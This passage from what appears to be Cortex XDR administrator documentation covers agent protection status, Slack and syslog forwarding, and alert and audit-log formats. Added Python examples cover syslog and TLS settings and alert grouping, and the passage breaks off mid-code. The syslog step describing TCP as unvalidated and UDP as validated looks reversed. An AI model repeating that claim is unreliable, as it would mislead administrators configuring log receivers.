Monitor Agent Operational Status
From the Cortex XDR management console, you have full visibility into the Cortex XDR agent operational
status on the endpoint, which indicates whether the agent is providing protection according to its
predefined security policies and profiles. By observing the operational status on the endpoint, you can
identify when the agent may suffer from a technical issue or misconfiguration that interferes with the
agent’s protection capabilities or interaction with Cortex XDR and other applications. The Cortex XDR
agent reports the operational status as follows:
• Protected—Indicates that the Cortex XDR agent is running as configured and did not report any
exceptions to Cortex XDR.
• Partially protected—Indicates that the Cortex XDR agent reported one or more exceptions to Cortex
XDR.
• Unprotected—(Linux only) Indicates the Cortex XDR agent is not enforcing protection on the endpoint.
You can monitor the agent Operational Status in Endpoints > Endpoint Management > Endpoint
Administration. If the Operational Status field is missing, add it.
The operational status that the agent reports varies according to the exceptions reported by the Cortex
XDR agent.

Status Description

Protected (Windows, Mac, and Linux) Indicates all protection modules are running as
configured on the endpoint.

Partially protected Windows:
• XDR data collection is not running, or not set
• Behavioral threat protection is not running
• Malware protection is not running
• Exploit protection is not running
Mac:
• Operating system adaptive mode*
• XDR Data Collection is not running, or not set
• Behavioral threat protection is not running
• Malware protection is not running
• Exploit protection is not running
Linux:
• Kernel module not loaded**
• Kernel module compatible but not loaded**
• Kernel version not compatible**
• XDR Data Collection is not running, or not set
• Behavioral threat protection is not running
• Anti-malware flow is asynchronous
• Malware protection is not running
• Exploit protection is not running


Unprotected Windows, Mac, and Linux:
• Behavioral threat protection and Malware protection are not running
• Exploit protection and malware protection are not running
• The content is unavailable.

Status can have the following implications on the endpoint:
• *(Status)—The exploit protection module is not running.
• **(Status)—
• XDR data collection is not running
• Behavioral threat protection is not running
• Anti-malware flow is asynchronous
• Local privilege escalation protection is asynchronous

Log Forwarding
To help you stay informed and updated, you can easily forward Cortex XDR™ alerts and
reports to an external syslog receiver, a Slack channel, or to email accounts.

> Log Forwarding Data Types
> Integrate Slack for Outbound Notifications
> Integrate a Syslog Receiver
> Configure Notification Forwarding
> Cortex XDR Log Notification Formats

Log Forwarding Data Types
To ensure you and your colleagues are informed and updated about events in your Cortex XDR
deployment, you can Configure Notification Forwarding to Email, Slack, or a syslog receiver. The following
table displays the data types supported by each notification receiver.

Data Type Email Slack Syslog Cortex XSOAR

Alerts

Agent Audit Log — —


Cortex XDR Prevent
or Cortex XDR Pro per
Endpoint

Management Audit Log — — —

Reports — —

Integrate Slack for Outbound Notifications
Integrate the Cortex XDR app with your Slack workspace to better manage and highlight your Cortex XDR
alerts and reports. By creating a Cortex XDR Slack channel, you ensure that defined Cortex XDR alerts are
exposed on laptop and mobile devices using the Slack interface. Unlike email notifications, Slack channels
are dedicated spaces that you can use to contact specific members regarding your Cortex XDR alerts.
To configure a Slack notification, you must first install and configure the Cortex XDR app on Slack.

STEP 1 | From Cortex XDR, select > Settings > Integrations > External Applications.

STEP 2 | Select the provided link to install Cortex XDR on your Slack workspace.

You are directed to the Slack browser to install the Cortex XDR app. You can only use
this link to install Cortex XDR on Slack. Attempting to install from the Slack marketplace will
redirect you to the Cortex XDR documentation.

STEP 3 | Click Submit.
Upon successful installation, Cortex XDR displays the workspace to which you connected.

STEP 4 | Configure Notification Forwarding.


After you integrate with your Slack workspace, you can configure your forwarding settings.

Integrate a Syslog Receiver
To send Cortex XDR notifications to your Syslog server, you need to define the settings for the Syslog
receiver to which you want to send notifications.

STEP 1 | Before you define the Syslog settings, enable access to the following Cortex XDR IP addresses
for your deployment region in your firewall configurations:

Region Log Forwarding IP Addresses

US • 35.232.87.9
• 35.224.66.220

EU • 34.90.202.186
• 34.90.105.250

UK • 34.105.227.105
• 34.105.149.197

SG • 35.240.192.37
• 34.87.125.227

JP • 34.84.88.183
• 35.243.76.189

AU • 35.189.38.167
• 34.87.219.39

STEP 2 | Navigate to > Settings > Integrations > External Applications.

STEP 3 | In Syslog Servers, add a + New Server.

STEP 4 | Define the Syslog server parameters:
• Name—Unique name for the server profile.
• Destination—IP address or fully qualified domain name (FQDN) of the Syslog server.
• Port—The port number on which to send Syslog messages.
• Facility—Choose one of the Syslog standard values. The value maps to how your Syslog server uses
the facility field to manage messages. For details on the facility field, see RFC 5424.
• Protocol—Select a method of communication with the Syslog server:
• TCP—No validation is made on the connection with the Syslog server. However, if an error
occurs with the domain used to make the connection, the Test connection will fail.
• UDP—Cortex XDR runs a validation to ensure a connection was made with the Syslog server.

• TCP + SSL—Cortex XDR validates the Syslog server certificate and uses the certificate signature
and public key to encrypt the data sent over the connection.
• Certificate—The communication between Cortex XDR and the Syslog destination can use TLS. In
this case, upon connection, Cortex XDR validates that the Syslog receiver has a certificate signed by
either a trusted root CA or a self-signed certificate.
If your Syslog receiver uses a self-signed CA, Browse and upload your Self Signed Syslog Receiver CA.

Make sure the self-signed CA includes your public key.

If you only use a trusted root CA, leave the Certificate field empty.
• Ignore Certificate Error—Not recommended. Select this option to ignore certificate errors if they
occur; Cortex XDR then forwards alerts and logs even if the certificate contains errors.
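Two of the parameters above are worth checking from the receiving side before relying on forwarded alerts: the Facility value, which decides how the receiver files the messages, and the TLS options, which decide whether a receiver is actually authenticated. The following added example (not Cortex XDR code; it does not reproduce the exact message Cortex XDR emits, and the hostname, application name, and message text are constructed) computes the RFC 5424 PRI header a given facility and severity produce, parses it back the way a receiver routes on it, and builds the client TLS context that corresponds to the Certificate and Ignore Certificate Error choices.

```python
"""Facility and TLS checks for a Syslog receiver integration.

Added example, not Cortex XDR code. Message fields are constructed; the
facility and severity tables follow RFC 5424 section 6.2.1.
"""
from __future__ import annotations

import re
import ssl
from datetime import datetime, timezone

# RFC 5424 facility codes (short names for the table in section 6.2.1).
FACILITY_CODES = {
    "kern": 0, "user": 1, "mail": 2, "daemon": 3, "auth": 4, "syslog": 5,
    "lpr": 6, "news": 7, "uucp": 8, "cron": 9, "authpriv": 10, "ftp": 11,
    "ntp": 12, "audit": 13, "alert": 14, "clock2": 15,
    "local0": 16, "local1": 17, "local2": 18, "local3": 19,
    "local4": 20, "local5": 21, "local6": 22, "local7": 23,
}
# RFC 5424 severity codes.
SEVERITY_CODES = {"emerg": 0, "alert": 1, "crit": 2, "err": 3,
                  "warning": 4, "notice": 5, "info": 6, "debug": 7}

_PRI_RE = re.compile(r"^<(\d{1,3})>1 ")


def pri(facility: str, severity: str) -> int:
    """PRI = facility * 8 + severity."""
    return FACILITY_CODES[facility] * 8 + SEVERITY_CODES[severity]


def format_rfc5424(facility: str, severity: str, hostname: str, app: str,
                   msg: str, ts: datetime | None = None) -> str:
    """Minimal RFC 5424 line; PROCID, MSGID and STRUCTURED-DATA are left as '-'."""
    ts = ts or datetime.now(timezone.utc)
    stamp = ts.astimezone(timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ")
    return f"<{pri(facility, severity)}>1 {stamp} {hostname} {app} - - - {msg}"


def parse_pri(line: str) -> tuple[str, str]:
    """Recover the (facility, severity) names a receiver routes the line on."""
    m = _PRI_RE.match(line)
    if not m:
        raise ValueError("not an RFC 5424 message")
    value = int(m.group(1))
    if value > 191:  # 23 * 8 + 7 is the largest valid PRI
        raise ValueError("PRI out of range")
    facility = {v: k for k, v in FACILITY_CODES.items()}[value // 8]
    severity = {v: k for k, v in SEVERITY_CODES.items()}[value % 8]
    return facility, severity


def client_tls_context(self_signed_ca_path: str | None = None,
                       ignore_certificate_errors: bool = False) -> ssl.SSLContext:
    """Client TLS context matching the Certificate / Ignore Certificate Error choices.

    No CA file: the system trust store is used (receiver signed by a trusted root CA).
    CA file given: only that CA is trusted (receiver with a self-signed CA).
    Ignoring certificate errors disables chain and hostname validation, so the
    sender can no longer tell the real receiver from any host answering on that port.
    """
    ctx = ssl.create_default_context(cafile=self_signed_ca_path)
    if ignore_certificate_errors:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


if __name__ == "__main__":
    line = format_rfc5424("local0", "notice", "xdr-tenant", "cortex-xdr",
                          "Alert: Suspicious Process Creation")  # constructed
    print(line)
    print("routes on", parse_pri(line))
    print("verify mode with errors ignored:",
          client_tls_context(ignore_certificate_errors=True).verify_mode.name)
```

If the receiver files the test message under an unexpected facility, compare the `<PRI>` value at the start of the received line with `pri()` for the facility you selected; a mismatch points at the receiver's routing rules rather than at the Cortex XDR configuration.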

STEP 5 | Test the parameters to ensure a valid connection and Create when ready.
You can define up to five Syslog servers. Upon success, the table displays the Syslog servers and their
status.

STEP 6 | (Optional) Manage your Syslog server connection.


In the Syslog Servers table:
• Locate your Syslog server and right-click to Send text message to test the connection.
Cortex XDR sends a message to the defined Syslog server; check the server to confirm that the test
message arrived.
• Locate the Status field.
The Status field displays a Valid or Invalid TCP connection. Cortex XDR tests the connection with the
Syslog server every 10 minutes. If no connection is found after 1 hour, Cortex XDR sends a notice to the
Notification Center.

If you find the Syslog data limited, it is recommended that you run the Get Alerts API for
complete alert data.

STEP 7 | Configure Notification Forwarding.


After you integrate with your Syslog receiver, you can configure your forwarding settings.

Configure Notification Forwarding
With Cortex XDR you can choose to receive notifications to keep up with the alerts and events that matter
to your teams. To forward notifications, you create a forwarding configuration that specifies the log type
you want to forward. You can also add filters to your configuration to send notifications that match specific
criteria.

Cortex XDR applies the filter only to future alerts and events.

Use this workflow to configure notifications for alerts, agent audit logs, and management audit logs. To
receive notifications about reports, see Create a Report from Scratch.

STEP 1 | Navigate to > Settings > Notifications.

STEP 2 | + Add Forwarding Configuration.

STEP 3 | Define the configuration Name and Description.

STEP 4 | Select the Log Type you want to forward, one of the following:
• Alerts—Send notifications for specific alert types (for example, XDR Agent or BIOC).
• Agent Audit Logs—Send notifications for audit logs reported by your Cortex XDR agents.
• Management Audit Logs—Send notifications for audit logs about events related to your Cortex XDR
management console.

STEP 5 | In the Configuration Scope, Filter the type of information you want included in a notification.
For example, set a filter Severity = Medium, Alert Source = XDR Agent. Cortex XDR sends
the alerts or events matching this filter as a notification.

STEP 6 | Define your Email Configuration.


1. In Email Distribution, add the email addresses to which you want to send email notifications.
2. Define the Email Grouping Time Frame, in minutes, to specify how often Cortex XDR sends
notifications. Alerts or events aggregated within this time frame are sent together, 30 alerts or 30
events per notification, sorted according to severity. To send a notification as soon as one alert or
event is generated, set the time frame to 0.
3. Choose whether you want Cortex XDR to provide an auto-generated subject.
4. If you previously used the Log Forwarding app and want to continue forwarding logs in the same
format, you can Use Legacy Log Format. See Cortex XDR Log Notification Formats.
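The interaction between the Configuration Scope filter (step 5) and the Email Grouping Time Frame (step 6) determines how many emails a burst of alerts produces and which alert heads each one. The following added example (not Cortex XDR code; the alert names, timestamps, and sources are constructed, and only the scope fields shown are modelled) applies a scope filter, batches the matching alerts per time frame with 30 per notification, sorts each batch by severity, and sends one notification per alert when the time frame is 0.

```python
"""Model of scope filtering and email grouping for alert notifications.

Added example, not Cortex XDR code. Alerts are constructed.
"""
from __future__ import annotations

from dataclasses import dataclass

MAX_PER_NOTIFICATION = 30
SEVERITY_ORDER = {"Critical": 0, "High": 1, "Medium": 2, "Low": 3, "Informational": 4}


@dataclass(frozen=True)
class Alert:
    name: str
    severity: str
    source: str
    timestamp: int  # seconds since epoch (constructed)


BASE = 1_604_275_200  # 2020-11-02T00:00:00Z, constructed
SAMPLE_ALERTS = (
    [Alert(f"Suspicious Process Creation #{i}", "Medium", "XDR Agent", BASE + 10 * i)
     for i in range(32)]
    + [Alert("Credential Dumping", "High", "XDR Agent", BASE + 5),
       Alert("BIOC rule match", "Low", "BIOC", BASE + 15),
       Alert("Suspicious Process Creation #32", "Medium", "XDR Agent", BASE + 3600)]
)


def matches_scope(alert: Alert, scope: dict[str, str]) -> bool:
    """Configuration Scope filter: every listed field must equal its value."""
    return all(getattr(alert, field_name) == value for field_name, value in scope.items())


def group_notifications(alerts, scope: dict[str, str], grouping_minutes: int) -> list[list[Alert]]:
    """Return the notifications (lists of alerts) the configuration would send."""
    selected = sorted((a for a in alerts if matches_scope(a, scope)), key=lambda a: a.timestamp)
    if grouping_minutes == 0:
        return [[a] for a in selected]  # one notification per alert

    window = grouping_minutes * 60
    notifications: list[list[Alert]] = []
    batch: list[Alert] = []
    window_start: int | None = None

    def flush() -> None:
        nonlocal batch, window_start
        if batch:
            # Each notification lists its alerts by severity, highest first.
            notifications.append(sorted(batch, key=lambda a: SEVERITY_ORDER[a.severity]))
        batch, window_start = [], None

    for alert in selected:
        if window_start is None:
            window_start = alert.timestamp
        elif alert.timestamp - window_start >= window:
            flush()  # time frame elapsed: send what was collected
            window_start = alert.timestamp
        batch.append(alert)
        if len(batch) == MAX_PER_NOTIFICATION:
            flush()  # 30 alerts per notification
    flush()
    return notifications


if __name__ == "__main__":
    for n, batch in enumerate(group_notifications(SAMPLE_ALERTS, {"source": "XDR Agent"}, 10), 1):
        print(f"notification {n}: {len(batch)} alerts, first: {batch[0].name} ({batch[0].severity})")
```

With the constructed burst and a 10 minute time frame the agent-sourced alerts arrive as three emails (30, 3, and 1 alerts) and the single High alert heads the first one; with a time frame of 0 the same burst produces 34 separate emails, which is the trade-off to weigh when a distribution list also feeds a ticketing system.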

STEP 7 | Configure additional forwarding options:


Depending on the notification integrations supported by the Log Type, configure the desired notification
settings.
• Slack notification—Select a Slack channel.

Before you can select a Slack channel, you must Integrate Slack for Outbound
Notifications.
• Syslog receiver—Select a Syslog receiver.

Before you can select a Syslog server, you must Integrate a Syslog Receiver in Cortex
XDR app.

STEP 8 | (Optional) To later modify a saved forwarding configuration, right-click the configuration, and
Edit, Disable, or Delete it.

Cortex XDR Log Notification Formats
When Cortex XDR alerts and audit logs are forwarded to an external data source, notifications are sent in
the following formats. If you prefer Cortex XDR to forward logs in legacy format, you can choose the legacy
option in your log forwarding configuration.
• Alert Notification Format
• Agent Audit Log Notification Format
• Management Audit Log Notification Format
• Legacy—Cortex XDR Log Format for IOC and BIOC Alerts
• Legacy—Cortex XDR (formerly Traps) Log Formats

Alert Notification Format


Cortex XDR Agent, BIOC, IOC, Analytics and third-party alerts are forwarded to external data resources
according to the following formats.

Email Account
Alert notifications are sent to email accounts according to the settings you configured when you Configure
Notification Forwarding. If only one alert exists in the queue, a single alert email format is sent. If more than
one alert was grouped in the time frame, all the alerts in the queue are forwarded together in a grouped
email format. Emails also include a code snippet of the alert fields, matching the columns in the Alerts
table.
Single Alert Email

Email Subject: Alert: <alert_name>


Email Body:
Alert Name: Suspicious Process Creation
Severity: High
Source: XDR Agent
Category: Malware
Action: Detected
Host: WIN-RN4A1D7IM6L
Username: b_julia
Excluded: No
Starred: Yes
Alert: <link to Cortex XDR app alert view>
Incident: <link to Cortex XDR app incident view>

Grouped Alert Email

Email Subject: Alerts: <first_highest_severity_alert> + x others


Email Body:
Alert Name: Suspicious Process Creation
Severity: High
Source: XDR Agent
Category: Malware
Action: Detected
Host: WIN-RN4A1D7IM6L
Username: b_julia
Excluded: No
Starred: Yes
Alert: <link to Cortex XDR app alert view>
Incident: <link to Cortex XDR app incident view>

Alert Name: Behavioral Threat Protection
Alert ID: 2412
Description: A really cool detection
Severity: Medium
Source: XDR Agent
Category: Exploit
Action: Prevented
Host: WIN-RN4A1D7IM6L
Starred: Yes
Alert: <link to Cortex XDR app alert view>
Incident: <link to Cortex XDR app incident view>
Notification Name: “My notification policy 2”
Notification Description: “Starred alerts with medium severity”

Email Body (JSON)

{
"original_alert_json":{
"uuid":"<UUID Value>",
"recordType":"threat",
"customerId":"<Customer ID>",
"severity":4,
"generatedTime":"2020-11-03T07:46:03.166000Z",
"originalAgentTime":"2020-11-03T07:46:01.372974700Z",
"serverTime":"2020-11-03T07:46:03.312633",
"isEndpoint":1,
"agentId":"<agent ID>",
"endPointHeader":{
"osVersion":"<OS version>",
"agentIp":"<Agent IP Address>",
"deviceName":"<Device Name>",
"agentVersion":"<Agent Version>",
"contentVersion":"152-40565",
"policyTag":"<Policy Tag Value>",
"securityStatus":0,
"protectionStatus":0,
"dataCollectionStatus":1,
"isolationStatus":0,
"agentIpList":[
"<IP Address>"
],
"addresses":[
{
"ip":[
"<IP Address>"
],
"mac":"<Mac ID>"
}
],
"liveTerminalEnabled":true,
"scriptExecutionEnabled":true,
"fileRetrievalEnabled":true,
"agentLocation":0,
"fileSearchEnabled":false,
"deviceDomain":"env21.local",
"userName":"Aragorn",
"userDomain":"env21.local",
"userSid":"<User S ID>",
"osType":1,
"is64":1,
"isVdi":0,
"agentId":"<Agent ID>",

"agentTime":"2020-11-03T07:46:03.166000Z",
"tzOffset":120
},
"messageData":{
"eventCategory":"prevention",
"moduleId":"COMPONENT_WILDFIRE",
"moduleStatusId":"CYSTATUS_MALICIOUS_EXE",
"preventionKey":"<Prevention Key>",
"processes":[
{
"pid":111,
"parentId":<Parent ID>,
"exeFileIdx":0,
"userIdx":0,
"commandLine":"\"C:\\<file path>\\test.exe\" ",
"instanceId":"Instance ID",
"terminated":0
}
],
"files":[
{
"rawFullPath":"C:\\<file path>\\test.exe",
"fileName":"test.exe",
"sha256":"<SHA256 Value>",
"fileSize":"12800",
"innerObjectSha256":"<SHA256 Value>"
}
],
"users":[
{
"userName":"<User Name>",
"userDomain":"<Domain Name>",
"domainUser":"<Domain Name>\\<User Name>"
}
],
"urls":[

],
"postDetected":0,
"sockets":[

],
"containers":[

],
"techniqueId":[

],
"tacticId":[

],
"modules":[

],
"javaStackTrace":[

],
"terminate":0,
"block":0,
"eventParameters":[
"C:\\<file path>\\test.exe",
"B30--A56B9F",

"B30--A56B9F",
"1"
],
"sourceProcessIdx":0,
"fileIdx":0,
"verdict":1,
"canUpload":0,
"preventionMode":"reported",
"trapsSeverity":2,
"profile":"Malware",
"description":"WildFire Malware",
"cystatusDescription":"Suspicious executable detected",
"sourceProcess":{
"user":{
"userName":"<User Name>",
"userDomain":"<Domain Name>",
"domainUser":"<Domain Name>\\<User Name>"
},
"pid":1111,
"parentId":<Parent ID>,
"exeFileIdx":0,
"userIdx":0,
"commandLine":"\"C:\\<file path>\\test.exe\" ",
"instanceId":"<Instance ID>",
"terminated":0,
"rawFullPath":"C:\\<file path>\\Test.exe",
"fileName":"test.exe",
"sha256":"<SHA256 Value>",
"fileSize":"12800",
"innerObjectSha256":"<SHA256 Value>"
},
"policyId":"<Policy ID>"
}
},
"internal_id":<Internal ID>,
"external_id":"<External ID>",
"severity":"SEV_030_MEDIUM",
"matching_status":"MATCHED",
"end_match_attempt_ts":1604389636437,
"alert_source":"TRAPS",
"local_insert_ts":1604570760,
"source_insert_ts":160470366,
"alert_name":"WildFire Malware",
"alert_category":"Malware",
"alert_description":"Suspicious executable detected",
"bioc_indicator":null,
"matching_service_rule_id":null,
"attempt_counter":1,
"bioc_category_enum_key":null,
"alert_action_status":"REPORTED",
"case_id":111,
"is_whitelisted":false,
"starred":false,
"deduplicate_tokens":null,
"filter_rule_id":null,
"mitre_technique_id_and_name":[
""
],
"mitre_tactic_id_and_name":[
""
],
"agent_id":"80d2e314c92f6",

"agent_version":"7.2.1.2718",
"agent_ip_addresses":[
"10.208.213.137"
],
"agent_hostname":"<Agent Hostname>",
"agent_device_domain":"<Device Domain>",
"agent_fqdn":"<FQDN Value>",
"agent_os_type":"AGENT_OS_WINDOWS",
"agent_os_sub_type":"<Operating System Sub-Type> ",
"agent_data_collection_status":true,
"mac":"<Mac ID>",
"agent_is_vdi":null,
"agent_install_type":"STANDARD",
"agent_host_boot_time":[
1604446615
],
"event_sub_type":null,
"module_id":[
"WildFire"
],
"association_strength":null,
"dst_association_strength":null,
"story_id":null,
"is_disintegrated":null,
"event_id":null,
"event_type":[
1
],
"event_timestamp":[
1604389563166
],
"actor_effective_username":[
"<Domain Name>\\<User Name>"
],
"actor_process_instance_id":[
"<Actor>\/<Instance ID>"
],
"actor_process_image_path":[
"C:\\<file path>\\test.exe"
],
"actor_process_image_name":[
"test.exe"
],
"actor_process_command_line":[
"\"C:\\<file path>\\test.exe\" "
],
"actor_process_signature_status":[
"SIGNATURE_UNSIGNED"
],
"actor_process_signature_vendor":null,
"actor_process_image_sha256":[
"<SHA256 Value>"
],
"actor_process_image_md5":[
"<MD5 Value>"
],
"actor_process_causality_id":[
"<Actor>\/<Causality ID>"
],
"actor_causality_id":null,
"actor_process_os_pid":[
1111

],
"actor_thread_thread_id":[
1222
],
"causality_actor_process_image_name":[
"test1.exe"
],
"causality_actor_process_command_line":[
"C:\\<file path>\\test1.EXE"
],
"causality_actor_process_image_path":[
"C:\\<file path>\\test1.exe"
],
"causality_actor_process_signature_vendor":[
"Microsoft Corporation"
],
"causality_actor_process_signature_status":[
"SIGNATURE_SIGNED"
],
"causality_actor_causality_id":[
"AdaxtV\/iNIMAAAc8AAAAAA=="
],
"causality_actor_process_execution_time":[
1604389557724
],
"causality_actor_process_image_md5":null,
"causality_actor_process_image_sha256":[
"<SHA256 Value>"
],
"action_file_path":null,
"action_file_name":null,
"action_file_md5":null,
"action_file_sha256":null,
"action_file_macro_sha256":null,
"action_registry_data":null,
"action_registry_key_name":null,
"action_registry_value_name":null,
"action_registry_full_key":null,
"action_local_ip":null,
"action_local_port":null,
"action_remote_ip":null,
"action_remote_port":null,
"action_external_hostname":null,
"action_country":[
"UNKNOWN"
],
"action_process_instance_id":null,
"action_process_causality_id":null,
"action_process_image_name":null,
"action_process_image_sha256":null,
"action_process_image_command_line":null,
"action_process_signature_status":[
"SIGNATURE_UNAVAILABLE"
],
"action_process_signature_vendor":null,
"os_actor_effective_username":null,
"os_actor_process_instance_id":null,
"os_actor_process_image_path":null,
"os_actor_process_image_name":null,
"os_actor_process_command_line":null,
"os_actor_process_signature_status":[
"SIGNATURE_UNAVAILABLE"

],
"os_actor_process_signature_vendor":null,
"os_actor_process_image_sha256":null,
"os_actor_process_causality_id":null,
"os_actor_causality_id":null,
"os_actor_process_os_pid":null,
"os_actor_thread_thread_id":[
1396
],
"fw_app_id":null,
"fw_interface_from":null,
"fw_interface_to":null,
"fw_rule":null,
"fw_rule_id":null,
"fw_device_name":null,
"fw_serial_number":null,
"fw_url_domain":null,
"fw_email_subject":null,
"fw_email_sender":null,
"fw_email_recipient":null,
"fw_app_subcategory":null,
"fw_app_category":null,
"fw_app_technology":null,
"fw_vsys":null,
"fw_xff":null,
"fw_misc":null,
"fw_is_phishing":[
"NOT_AVAILABLE"
],
"dst_agent_id":null,
"dst_causality_actor_process_execution_time":null,
"dns_query_name":null,
"dst_action_external_hostname":null,
"dst_action_country":null,
"dst_action_external_port":null,
"is_pcap":null,
"is_excluded":false
}

Slack Channel
You can send alert notifications to a single Slack contact or a Slack channel. Notifications are similar to the
email format.

Syslog Server
Alert notifications forwarded to a Syslog server are sent in CEF format (RFC 5425) according to the following mapping.

Section          Description

Syslog Header    <9>: PRI (priority field)
                 1: version number
                 2020-03-22T07:55:07.964311Z: timestamp of when the alert/log was sent
                 cortexxdr: host name

CEF Header       HEADER/Vendor="Palo Alto Networks" (constant string)
                 HEADER/Device Product="Cortex XDR" (constant string)
                 HEADER/Product Version=Cortex XDR version (2.0/2.1...)
                 HEADER/Severity=integer (0 - Unknown, 6 - Low, 8 - Medium, 9 - High)
                 HEADER/Device Event Class ID=alert source
                 HEADER/name=alert name

CEF Body         end=timestamp shost=endpoint_name deviceFacility=facility cat=category
                 externalId=external_id request=request cs1=initiated_by_process
                 cs1Label=Initiated by (constant string) cs2=initiator_command
                 cs2Label=Initiator CMD (constant string) cs3=signature
                 cs3Label=Signature (constant string) cs4=cgo_name
                 cs4Label=CGO name (constant string) cs5=cgo_command
                 cs5Label=CGO CMD (constant string) cs6=cgo_signature
                 cs6Label=CGO Signature (constant string) dst=destination_ip
                 dpt=destination_port src=source_ip spt=source_port fileHash=file_hash
                 filePath=file_path targetprocesssignature=target_process_signature
                 tenantname=tenant_name tenantCDLid=tenant_id CSPaccountname=account_name
                 initiatorSha256=initiator_hash initiatorPath=initiator_path
                 osParentName=parent_name osParentCmd=parent_command
                 osParentSha256=parent_hash osParentSignature=parent_signature
                 osParentSigner=parent_signer incident=incident_id act=action

Example:

<177>1 2020-10-04T10:06:55.192016Z cortexxdr - - - - CEF:0|Palo Alto
Networks|Cortex XDR|Cortex XDR 2.4|XDR Analytics|High Connection Rate|
6|end=1601792870694 shost=WGHRAMG deviceFacility=None cat=Discovery
externalId=98106342 request=https:\/\/iga-bh.xdr.eu.paloaltonetworks.com
\/alerts\/98106342 cs1=iexplore.exe cs1Label=Initiated by cs2=
\“C:\\\\Program Files (x86)\\\\Internet Explorer\\\\IEXPLORE.EXE
\” SCODEF:11844 CREDAT:82946 \/prefetch:2 cs2Label=Initiator CMD
cs3=Microsoft CorporationSIGNATURE_SIGNED- cs3Label=Signature
cs4=iexplore.exe cs4Label=CGO name cs5=\“C:\\\\Program Files (x86)\
\\\Internet Explorer\\\\IEXPLORE.EXE\” SCODEF:11844 CREDAT:82946 \/
prefetch:2 cs5Label=CGO CMD cs6=Microsoft CorporationSIGNATURE_SIGNED-
cs6Label=CGO Signature dst=10.12.4.37 dpt=8000 src=10.10.28.140 spt=58003
fileHash=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
filePath=C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe
targetprocesssignature=NoneSIGNATURE_UNAVAILABLE- tenantname=iGA
tenantCDLid=1021319191 CSPaccountname=Information & eGovernment Authority
initiatorSha256=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
initiatorPath=C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe
cgoSha256=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
osParentName=iexplore.exe osParentCmd=\“C:\\\\Program Files (x86)\\\
\Internet Explorer\\\\IEXPLORE.EXE\” SCODEF:11844 CREDAT:82946 \/prefetch:2
osParentSha256=e582676ec900249b408ab4e37976ae8c443635a7da77755daf6f896a172856a3
osParentSignature=SIGNATURE_SIGNED osParentSigner=Microsoft Corporation
incident=118719 act=Detected

Agent Audit Log Notification Format


To forward agent audit logs, you must have either a Cortex XDR Prevent or Cortex XDR Pro
per Endpoint license.

Cortex XDR forwards the agent audit log to external data resources according to the following formats.

Email Account
Cortex XDR can forward agent audit log notifications to email accounts.

Syslog Server
Agent audit logs forwarded to a Syslog server are sent in a CEF format RFC 5425 according to the following
mapping.

Section          Description

Syslog Header    <9>: PRI (priority field)
                 1: version number
                 2020-03-22T07:55:07.964311Z: timestamp of when the alert/log was sent
                 cortexxdr: host name

CEF Header       HEADER/Vendor="Palo Alto Networks" (constant string)
                 HEADER/Device Product="Cortex XDR Agent" (constant string)
                 HEADER/Device Version=Cortex XDR Agent version (7.0/7.1...)
                 HEADER/Severity=integer (0 - Unknown, 6 - Low, 8 - Medium, 9 - High)
                 HEADER/Device Event Class ID="Agent Audit Logs" (constant string)
                 HEADER/name=type

CEF Body         dvchost=domain shost=endpoint_name cat=category end=timestamp
                 rt=received_time cs1Label=agentversion (constant string)
                 cs1=agent_version cs2Label=subtype (constant string) cs2=subtype
                 cs3Label=result (constant string) cs3=result
                 cs4Label=reason (constant string) cs4=reason msg=event_description
                 tenantname=tenant_name tenantCDLid=tenant_id CSPaccountname=csp_id

Example:

<182>1 2020-10-04T10:41:14.608731Z cortexxdr - - - - CEF:0|Palo Alto Networks|
Cortex XDR Agent|Cortex XDR Agent 7.2.0.63060|Agent Audit Logs|Agent Service|
9|dvchost=WORKGROUP shost=Test-Agent cat=Monitoring end=1601808073102
rt=1601808074596 cs1Label=agentversion cs1=7.2.0.63060 cs2Label=subtype
cs2=Stop cs3Label=result cs3=N\/A cs4Label=reason cs4=None msg=XDR service
cyserver was stopped on Test-Agent tenantname=Test tenantCDLid=123456
CSPaccountname=1234

Management Audit Log Notification Format


Cortex XDR forwards the management audit log to external data sources according to the following
formats.

Email Account
Management audit log notifications are forwarded to email accounts.

Syslog Server
Management audit logs forwarded to a Syslog server are sent in CEF format (RFC 5425) according to the
following mapping:

Section          Description

Syslog Header    <9>: PRI (priority field)
                 1: version number
                 2020-03-22T07:55:07.964311Z: timestamp of when the alert/log was sent
                 cortexxdr: host name

CEF Header       HEADER/Vendor="Palo Alto Networks" (constant string)
                 HEADER/Device Product="Cortex XDR" (constant string)
                 HEADER/Device Version=Cortex XDR version (2.0/2.1...)
                 HEADER/Severity=integer (0 - Unknown, 6 - Low, 8 - Medium, 9 - High)
                 HEADER/Device Event Class ID="Management Audit Logs" (constant string)
                 HEADER/name=type

CEF Body         suser=user end=timestamp externalId=external_id
                 cs1Label=email (constant string) cs1=user_mail
                 cs2Label=subtype (constant string) cs2=subtype
                 cs3Label=result (constant string) cs3=result
                 cs4Label=reason (constant string) cs4=reason
                 msg=event_description tenantname=tenant_name
                 tenantCDLid=tenant_id CSPaccountname=csp_id

Example:

3/18/2012:05:17.567 PM<14>1 2020-03-18T12:05:17.567590Z cortexxdr -
- - CEF:0|Palo Alto Networks|Cortex XDR|Cortex XDR x.x |Management
Audit Logs|REPORTING|6|suser=test end=1584533117501 externalId=5820
cs1Label=email [email protected] cs2Label=subtype cs2=Slack
Report cs3Label=result cs3=SUCCESS cs4Label=reason cs4=None msg=Slack report
'scheduled_1584533112442' ID 00 to ['CUXM741BK', 'C01022YU00L', 'CV51Y1E2X',
'CRK3VASN9'] tenantname=test tenantCDLid=11111 CSPaccountname=00000
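The three syslog mappings above (alert notifications, agent audit logs and management audit logs) share one wire format, so a receiver can decode all of them with a single parser. The following is an added example, not Palo Alto Networks code: it assumes standard CEF escaping (\| in the header, \\ and \= in the extension), and its sample lines are constructed from the layouts in this guide with placeholder hosts, IDs and tenant names.

```python
"""Parse the CEF-over-syslog lines Cortex XDR forwards to a syslog receiver. Alert,
agent audit and management audit notifications share one layout (RFC 5424 header,
CEF:0 header, key=value extension) and differ only in Device Product, Device Event
Class ID and extension keys. Added example, not Palo Alto Networks code; the sample
lines are constructed from the layouts in this guide, with placeholder values."""
import re

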